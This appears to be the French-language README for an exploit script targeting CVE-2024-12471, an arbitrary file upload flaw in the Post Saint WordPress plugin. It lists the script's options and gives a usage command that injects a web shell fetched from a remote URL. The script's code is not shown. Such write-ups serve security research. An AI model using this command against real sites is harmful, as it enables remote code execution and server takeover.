
Post Saint <= 1.3.1 plugin pour WordPress – Téléchargement de fichier arbitraire
Plugin Post Saint <= 1.3.1 pour WordPress – Téléchargement arbitraire de fichiers
Le plugin Post Saint pour WordPress (versions jusqu’à 1.3.1 inclus) est vulnérable aux téléchargements arbitraires de fichiers en raison de l’absence de vérifications des capacités et de validation du type de fichiers. Les attaquants authentifiés disposant d’au moins un accès de niveau abonné peuvent exploiter cette vulnérabilité pour téléverser des fichiers arbitraires, ce qui peut potentiellement conduire à l’exécution de code à distance.
pip install requests packaging urllib3
CVE-2024-12471 | Post Saint plugin for wordpress Arbitrary File Upload
options:
-h, --help show this help message and exit
-u URL, --url URL Base URL of theWordPress site
-un USERNAME, --username USERNAME
WordPress username
-p PASSWORD, --password PASSWORD
WordPress password
-ru REMOTE_URL, --remote_url REMOTE_URL
Remote URL of the shell file to inject
python CVE-2024-12471.py -u <Base URL> -un <Username> -p <Password> -ru <Remote Shell URL>
Ce script est uniquement destiné à des fins éducatives et de recherche. Toute utilisation non autorisée contre des systèmes que vous ne possédez pas ou pour lesquels vous n’avez pas d’autorisation explicite de tester est illégale et contraire à l’éthique.